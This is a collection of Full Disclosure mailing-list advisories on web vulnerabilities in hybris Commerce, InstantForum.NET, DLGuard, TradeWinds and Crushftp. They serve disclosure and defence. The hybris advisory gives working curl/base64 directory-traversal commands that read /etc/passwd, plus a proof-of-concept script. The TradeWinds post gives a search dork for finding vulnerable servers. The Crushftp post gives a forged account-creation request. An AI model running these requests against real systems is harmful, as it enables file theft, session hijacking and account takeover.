[FD] [RT-SA-2014-016] Directory Traversal and Arbitrary File Disclosure in hybris Commerce Software Suite
Advisory: Directory Traversal and Arbitrary File Disclosure in hybris
Commerce Software Suite
During a penetration test, RedTeam Pentesting discovered a Directory
Traversal vulnerability in hybris Commerce software suite. This
vulnerability allows attackers to download arbitrary files of any size
from the affected system.
Details
===
Product: hybris Commerce Software Suite
Affected Versions:
Release 5.3: = 5.3.0.1
Release 5.2: = 5.2.0.3
Release 5.1.1: = 5.1.1.2
Release 5.1: = 5.1.0.1
Release 5.0.4: = 5.0.4.4
Release 5.0.3: = 5.0.3.3
Release 5.0.0: = 5.0.0.3
Fixed Versions:
Release 5.3: 5.3.0.2
Release 5.2: 5.2.0.4
Release 5.1.1:5.1.1.3
Release 5.1: 5.1.0.2
Release 5.0.4:5.0.4.5
Release 5.0.3:5.0.3.4
Release 5.0.0:5.0.0.4
Vulnerability Type: Directory Traversal, Arbitrary File Disclosure
Security Risk: high
Vendor URL: http://www.hybris.com/
Vendor Status: fixed version released
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2014-016
Advisory Status: published
CVE: CVE-2014-8871
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8871
Introduction
hybris delivers a commerce software suite that is best in class,
helping a company execute all its direct selling processes and present a
single view and a unified experience to all its customers.
(from the vendor's homepage)
More Details
Webshops based on hybris may use an image retrieval system where images
are identified by a URL parameter named context rather than a file
name. When this system is used, images can be referenced e.g. like the
following:
img src=/medias/image.jpg?context=bWFzdGVyfHJvb3R8MTIzNDV8aW1hZ2UvanBl
Z3w3NDE1Njg3MzYxMTcyLmpwZ3xlM2IwYzQ0Mjk4ZmMxYzE0OWFmYmY0Yzg5OTZmYjkyNDI3
YWU0MWU0NjQ5YjkzNGNhNDk1OTkxYjc4NTJiODU1 alt=[...] width=200 /
Changing the file name part of the URL from image.jpg to e.g.
redteam.jpg reveals that not the file name part of the URL, but the
value of the parameter context is used to select the desired file.
A closer look at the parameter shows that its value is encoded as
Base64. Decoding it reveals a pipe-separated data structure which
includes a file size (third value), a file name (fifth value) and a
SHA-256 hash (sixth value):
$ echo -n bWFzdGVyfHJvb3R8MTIzNDV8aW1hZ2UvanBlZ3w3NDE1Njg3MzYxMTcyLmpw\
Z3xlM2IwYzQ0Mjk4ZmMxYzE0OWFmYmY0Yzg5OTZmYjkyNDI3YWU0MWU0NjQ5YjkzNGNhNDk\
1OTkxYjc4NTJiODU1 | base64 -d
master|root|12345|image/jpeg|7415687361172.jpg|e3b0c44298fc1c149afbf4c89
96fb92427ae41e4649b934ca495991b7852b855
During the penetration test many parameters were inspected and it turned
out that the SHA-256 hash is used to reference a particular version of
the file, and can be replaced by a dash (-) character, which always
returns the latest version. The example request can be modified and
requested with curl as follows:
$ echo -n master|root|12345|image/jpeg|7415687361172.jpg|- | base64
bWFzdGVyfHJvb3R8MTIzNDV8aW1hZ2UvanBlZ3w3NDE1Njg3MzYxMTcyLmpwZ3wt
$ curl -I http://www.example.com/medias/redteam?context=bWFzdGVyfHJvb3R\
8MTIzNDV8aW1hZ2UvanBlZ3w3NDE1Njg3MzYxMTcyLmpwZ3wt
It was verified that the file name (fifth) value is vulnerable to
directory traversal. This enables attackers to retrieve the contents of
other files from the server's filesystem by using sequences of ../.
The following HTTP request for example delivers the contents of the file
/etc/passwd:
$ echo -n master|root|12345|text/plain|../../../../../../etc/passwd|-\
| base64 -w0
bWFzdGVyfHJvb3R8MTIzNDV8dGV4dC9wbGFpbnwuLi8uLi8uLi8uLi8uLi8uLi9ldGMvcGFz
c3dkfC0=
$ curl http://www.example.com/medias/redteam?context=bWFzdGVyfHJvb3R8MT\
IzNDV8dGV4dC9wbGFpbnwuLi8uLi8uLi8uLi8uLi8uLi9ldGMvcGFzc3dkfC0
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
[...]
The size included in the third field of the data structure is used to
limit the number of bytes returned for a file. As it can be modified by
attackers, files of any size with arbitrary content can be downloaded,
provided the path to the file on the server is known. This enables
attackers to read, among others, the environment of the current process
at /proc/self/environ and the list of memory maps including the full
paths to loaded libraries at /proc/self/maps. This way, knowledge about
a particular instance of hybris can be gathered. Afterwards it is
possible to access configuration files like local.properties and the
log files for shop orders which also contain the current session-IDs of
users. Furthermore, the Java bytecode of hybris can be downloaded and
decompiled.
Proof of Concept
FILENAME=/etc/passwd
curl https://www.example.com/medias/redteam?context=$(base64 -w0 \
master|root|2|text/plain|../../../../../..${FILENAME}|-)
[FD] CVE-2014-9468 InstantASP InstantForum.NET Multiple XSS (Cross-Site Scripting) Security Vulnerabilities
*CVE-2014-9468 InstantASP InstantForum.NET Multiple XSS (Cross-Site Scripting) Security Vulnerabilities* Exploit Title: InstantASP InstantForum.NET Multiple XSS (Cross-Site Scripting) Security Vulnerabilities Product: InstantForum.NET Vendor: InstantASP Vulnerable Versions: v4.1.3 v4.1.1 v4.1.2 v4.0.0 v4.1.0 v3.4.0 Tested Version: v4.1.3 v4.1.1 v4.1.2 Advisory Publication: Feb 18, 2015 Latest Update: Feb 18, 2015 Vulnerability Type: Cross-Site Scripting [CWE-79] CVE Reference: CVE-2014-9468 CVSS Severity (version 2.0): CVSS v2 Base Score: 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:P/A:N) (legend) Impact Subscore: 2.9 Exploitability Subscore: 8.6 Credit: Wang Jing [Mathematics, Nanyang Technological University, Singapore] *Advisory Details:* *(1) Vendor Product Description:* *Vendor:* InstantASP *Product Version:* InstantForum.NET v4.1.3 v4.1.1 v4.1.2 v4.0.0 v4.1.0 v3.4.0 *Vendor URL Download:* InstantForum.NET can be downloaded from here, http://docs.instantasp.co.uk/InstantForum/default.html?page=v413tov414guide.html *Product Introduction:* “InstantForum.NET is a feature rich, ultra high performance ASP.NET SQL Server discussion forum solution designed to meet the needs of the most demanding online communities or internal collaboration environments. Now in the forth generation, InstantForum.NET has been completely rewritten from the ground-up over several months to introduce some truly unique features performance enhancements. The new administrator control panel now offers the most comprehensive control panel available for any ASP.NET based forum today. Advanced security features such as role based permissions and our unique Permission Sets feature provides unparalleled configurable control over the content and features that are available to your users within the forum. Moderators can easily be assigned to specific forums with dedicated moderator privileges for each forum. Bulk moderation options ensure even the busiest forums can be managed effectively by your moderators. The forums template driven skinning architecture offers complete customization support. Each skin can be customized to support a completely unique layout or visual appearance. A single central style sheet controls every aspect of a skins appearance. The use of unique HTML wrappers and ASP.NET 1.1 master pages ensures page designers can easily integrate an existing design around the forum. Skins, wrappers master page templates can be applied globally to all forums or to any specific forum. *(2) Vulnerability Details:* InstantForum.NET has a security problem. It can be exploited by XSS attacks. *(2.1)* The first vulnerability occurs at “Join.aspx” page with SessionID parameter of it. *(2.2)* The second vulnerability occurs at “Logon.aspx” page with SessionID parameter of it. *References:* http://tetraph.com/security/cves/cve-2014-9468-instantasp-instantforum-net-multiple-xss-cross-site-scripting-security-vulnerabilities/ http://securityrelated.blogspot.com/2015/02/cve-2014-9468-instantasp.html https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9468 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9468 https://security-tracker.debian.org/tracker/CVE-2014-9468 http://www.cvedetails.com/cve/CVE-2014-9468/ http://www.security-database.com/detail.php?alert=CVE-2014-9468 http://packetstormsecurity.com/files/cve/CVE-2014-9468 http://www.pentest.it/cve-2014-9468.html http://www.naked-security.com/cve/CVE-2014-9468/ http://www.inzeed.com/kaleidoscope/cves/cve-2014-9468/ http://007software.net/cve-2014-9468/ http://diebiyi.com/articles/%E5%AE%89%E5%85%A8/cve-2014-9468/ https://vulnerabilitypost.wordpress.com/2015/02/18/cve-2014-9468/ https://security-tracker.debian.org/tracker/CVE-2014-9468 -- Wang Jing, Division of Mathematical Sciences (MAS), School of Physical and Mathematical Sciences (SPMS), Nanyang Technological University (NTU), Singapore. http://www.tetraph.com/wangjing/ https://twitter.com/justqdjing ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives RSS: http://seclists.org/fulldisclosure/
[FD] DLGuard Multiple XSS (Cross-Site Scripting) Security Vulnerabilities
*DLGuard Multiple XSS (Cross-Site Scripting) Security Vulnerabilities* Exploit Title: DLGuard Multiple XSS (Cross-Site Scripting) Security Vulnerabilities Product: DLGuard Vendor: DLGuard Vulnerable Versions: v5 v4.6 v4.5 Tested Version: v5 v4.6 Advisory Publication: Feb 18, 2015 Latest Update: Feb 18, 2015 Vulnerability Type: Cross-Site Scripting [CWE-79] CVE Reference: * Credit: Wang Jing [Mathematics, Nanyang Technological University, Singapore] *Advisory Details:* *(1) Vendor Product Description:* *Vendor:* DLGuard *Product Version:* DLGuard v5 v4.6 v4.5 *Vendor URL Download:* DLGuard can be downloaded from here, http://www.dlguard.com/dlginfo/index.php *Product Introduction:* “DLGuard is a powerful, yet easy to use script that you simply upload to your website and then rest assured that your internet business is not only safe, but also much easier to manage, automating the tasks you just don't have the time for. DLGuard supports the three types, or methods, of sale on the internet: 1Single item sales (including bonus products!) 2Multiple item sales 3Membership websites *(2) Vulnerability Details:* DLGuard has a security problem. It can be exploited by XSS attacks. *(2.1)* The first vulnerability occurs at “index.php” page with page c redirect parameters of it. *(2.2)* The second vulnerability occurs at main page's search field with searchTerm parameter in HTTP POST. *References:* http://tetraph.com/security/xss-vulnerability/dlguard-multiple-xss-cross-site-scripting-security-vulnerabilities/ http://securityrelated.blogspot.com/2015/02/dlguard-multiple-xss-cross-site.html -- Wang Jing, Division of Mathematical Sciences (MAS), School of Physical and Mathematical Sciences (SPMS), Nanyang Technological University (NTU), Singapore. http://www.tetraph.com/wangjing/ https://twitter.com/justqdjing ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives RSS: http://seclists.org/fulldisclosure/
[FD] DLGuard Full Path Disclosure (Information Leakage) Security Vulnerabilities
*DLGuard Full Path Disclosure (Information Leakage) Security Vulnerabilities* Exploit Title: DLGuard /index.php c parameter Full Path Disclosure Security Vulnerabilities Product: DLGuard Vendor: DLGuard Vulnerable Versions: v4.5 Tested Version: v4.5 Advisory Publication: Feb 18, 2015 Latest Update: Feb 18, 2015 Vulnerability Type: Information Exposure [CWE-200] CVE Reference: * Credit: Wang Jing [Mathematics, Nanyang Technological University, Singapore] *Advisory Details:* *(1) Vendor Product Description:* *Vendor:* DLGuard *Product Version:* DLGuard v4.5 *Vendor URL Download:* DLGuard can be downloaded from here, http://www.dlguard.com/dlginfo/index.php *Product Introduction:* “DLGuard is a powerful, yet easy to use script that you simply upload to your website and then rest assured that your internet business is not only safe, but also much easier to manage, automating the tasks you just don't have the time for. DLGuard supports the three types, or methods, of sale on the internet: 1Single item sales (including bonus products!) 2Multiple item sales 3Membership websites *(2) Vulnerability Details:* DLGuard has a security problem. It can be exploited by Full Path Disclosure attacks. *(2.1)* The first vulnerability occurs at “index.php” page with c parameters of it. *References:* http://tetraph.com/security/full-path-disclosure-vulnerability/dlguard-full-path-disclosure-information-leakage-security-vulnerabilities/ http://securityrelated.blogspot.com/2015/02/dlguard-full-path-disclosure.html -- Wang Jing, Division of Mathematical Sciences (MAS), School of Physical and Mathematical Sciences (SPMS), Nanyang Technological University (NTU), Singapore. http://www.tetraph.com/wangjing/ https://twitter.com/justqdjing ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives RSS: http://seclists.org/fulldisclosure/
[FD] Bug in TradeWinds
Hi, I turn to you because I want to make public a bug, a web server called Trade Winds, by which much compromising information of internal servers exposed ... Through a Dork on google: inurl: cgi-shl / twserver.exe run?. They are vulnerable server, injecting this url: http: //victim/cgi-shl/twserver.exe run (example: CityInfo?). Which brings us back an error with this data: TradeWinds: Environment variables sent by Microsoft-IIS / 6.0 ALLUSERSPROFILE = C: \ Documents and Settings \ All Users APP_POOL_ID = DefaultAppPool ClusterLog = C: \ WINDOWS \ Cluster \ cluster.log CommonProgramFiles = C: \ Program Files \ Common Files COMPUTERNAME = WEBSERVER ComSpec = C: \ WINDOWS \ system32 \ cmd.exe DSETPATH = C: \ Program Files \ Dell \ DSET FP_NO_HOST_CHECK = NO lib = C: \ Program Files \ SQLXML 4.0 \ bin \ NUMBER_OF_PROCESSORS = 2 OS = Windows_NT Path = C: \ PHP \; C: \ Perl \ site \ bin; C: \ Perl \ bin; C: \ Program Files \ Support Tools \; C: \ PVSW \ BIN; C: \ CFusionMX7 \ verity \ k2 \ _nti40 \ bin; C: \ WINDOWS \ system32; C: \ WINDOWS; C: \ WINDOWS \ System32 \ Wbem; C: \ Program Files \ Dell \ SysMgt \ RAC5; C: \ Program Files \ Dell \ SysMgt \ oma \ bin; C: \ Program Files \ Microsoft SQL Server \ 80 \ Tools \ Binn \; C: \ Program Files \ Microsoft SQL Server \ 90 \ Tools \ Binn \; C: \ Program Files \ Microsoft SQL Server \ 90 \ DTS \ Binn \; C: \ Program Files \ Microsoft SQL Server \ 90 \ Tools \ Binn \ VSShell \ Common7 \ IDE \; C: \ Program Files \ Microsoft Visual Studio 8 \ Common7 \ IDE \ PrivateAssemblies \; D: \ MySQL \ MySQL 1.3.6 Utilities \ PATHEXT = .COM; .EXE; .BAT; .CMD; .VBS; .VBE; .JS; .JSE; .wsf; .WSH PHPRC = C: \ PHP \ PROCESSOR_ARCHITECTURE = x86 PROCESSOR_IDENTIFIER = x86 Family 6 Model 62 Stepping 4 GenuineIntel PROCESSOR_LEVEL = 6 PROCESSOR_REVISION = 3e04 ProgramFiles = C: \ Program Files SystemDrive = C: SystemRoot = C: \ WINDOWS TEMP = C: \ WINDOWS \ TEMP TMP = C: \ WINDOWS \ TEMP USERPROFILE = C: \ Documents and Settings \ Default User VERITY_CFG = C: \ CFusionMX7 \ verity \ k2 \ common \ verity.cfg VSL = C: \ PVSW \ BIN windir = C: \ WINDOWS That data and more the server, and the pc making the connection. So I decided to report to you and make public the ruling. Greetings and hope not having bothered with their time. ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives RSS: http://seclists.org/fulldisclosure/
[FD] DLGuard SQL Injection Security Vulnerabilities
DLGuard SQL Injection Security Vulnerabilities Exploit Title: DLGuard /index.php c parameter SQL Injection Security Vulnerabilities Product: DLGuard Vendor: DLGuard Vulnerable Versions: v4.5 Tested Version: v4.5 Advisory Publication: Feb 18, 2015 Latest Update: Feb 18, 2015 Vulnerability Type: Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) (CWE-89) CVE Reference: * Credit: Wang Jing [Mathematics, Nanyang Technological University, Singapore] *Advisory Details:* *(1) Vendor Product Description:* *Vendor:* DLGuard *Product Version:* DLGuard v4.5 *Vendor URL Download:* DLGuard can be downloaded from here, http://www.dlguard.com/dlginfo/index.php *Product Introduction:* “DLGuard is a powerful, yet easy to use script that you simply upload to your website and then rest assured that your internet business is not only safe, but also much easier to manage, automating the tasks you just don't have the time for. DLGuard supports the three types, or methods, of sale on the internet: 1Single item sales (including bonus products!) 2Multiple item sales 3Membership websites *(2) Vulnerability Details:* DLGuard has a security problem. It can be exploited by SQL Injection attacks. *(2.1)* The first vulnerability occurs at “index.php” page with c parameters of it. *References:* http://tetraph.com/security/sql-injection-vulnerability/dlguard-sql-injection-security-vulnerabilities/ http://securityrelated.blogspot.com/2015/02/dlguard-sql-injection-security.html -- Wang Jing, Division of Mathematical Sciences (MAS), School of Physical and Mathematical Sciences (SPMS), Nanyang Technological University (NTU), Singapore. http://www.tetraph.com/wangjing/ https://twitter.com/justqdjing ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives RSS: http://seclists.org/fulldisclosure/
[FD] Crushftp 7.2.0 - Multiple CSRF XSS Vulnerabilities
I. Overview Multiple CSRF Cross-Site Scripting (XSS) vulnerabilities have been identified in Crushftp 7.2.0 (Web Interface) on default configuration. These vulnerabilities allows an attacker to gain control over valid user accounts, perform operations on their behalf, redirect them to malicious sites, steal their credentials, and more. II. Severity Rating: Medium Remote: Yes Authentication Require: Yes III. Vendor's Description of Application CrushFTP is a robust file transfer server that makes it easy to setup secure connections with your users. 'Crush' comes from the built-in zip methods in CrushFTP. They allow for downloading files in compressed formats in-stream, or even automatically expanding zip files as they are received in-stream. This is called ZipStreaming and can greatly accelerate the transfer of many types of files. Secure management is web based allowing you the ability to manage and monitor the server from anywhere, or with almost any device. Easy in place server upgrades without complicated installers. Runs as a daemon, or Windows service with no need for a local GUI. CrushFTP is watching out for you by detecting common hack attempts and robots which scan for weak passwords. It will automatically protect you against DDoS attacks. No need for you to do anything as CrushFTP will automatically ban these IPs to prevent wasted logging and CPU usage. This keeps your server secure from unwanted abuse. User management includes inheritance, groups, and virtual file systems. If you want simple user management, it can be as easy as just making a folder with a specific name and nothing else. Think about how easily you can delegate user administration with CrushFTP's role based administration and event configuration. http://www.crushftp.com/index.html IV. Vulnerability Details Exploit 1) Multiple CSRF Vulnerabilities (Web Management interface - Default Config) a) An attacker may add/delete/modify user's accounts b) May change all configuration settings Request Method: POST Location: /WebInterface/fuction/ Proof of Concept:- 2) Multiple Cross-Site Scripting (Web Interface - Default Config) Type: Reflected Request Method: POST Location: /WebInterface/function/ Parameter: vfs_items Values: vfs_items = Proof of Concept: POST /WebInterface/function/ HTTP/1.1 Host: 127.0.0.1:8080 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Referer: http://127.0.0.1:8080/WebInterface/UserManager/index.html Content-Length: 656 Cookie: X Connection: keep-alive Pragma: no-cache Cache-Control: no-cache command=setUserItemdata_action=newserverGroup=MainUsersusername=testuser=%3C%3Fxml+version%3D%221.0%22+encoding%3D%22UTF-8%22%3F%3E%3Cuser+type%3D%22properties%22%3E%3Cusername%3Etest2%3C%2Fusername%3E%3Cpassword%3Etest2%3C%2Fpassword%3E%3Cmax_logins%3E0%3C%2Fmax_logins%3E%3Croot_dir%3E%2F%3C%2Froot_dir%3E%3C%2Fuser%3ExmlItem=uservfs_items=%3C%3Fxml+version%3D%221.0%22+encoding%3D%22UTF-8%22%3F%3E%3Cvfs+type%3D%22properties%22%3E%3C%2Fvfs%3Epermissions=%3C%3Fxml+version%3D%221.0%22+encoding%3D%22UTF-8%22%3F%3E%3Cpermissions+type%3D%22properties%22%3E%3Citem+name%3D%22%2F%22%3E(read)(view)(resume)%3C%2Fitem%3E%3C%2Fpermissions%3E Type: Reflected Request Method: GET Location: /WebInterface/function/ Parameter: path Values: ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives RSS: http://seclists.org/fulldisclosure/
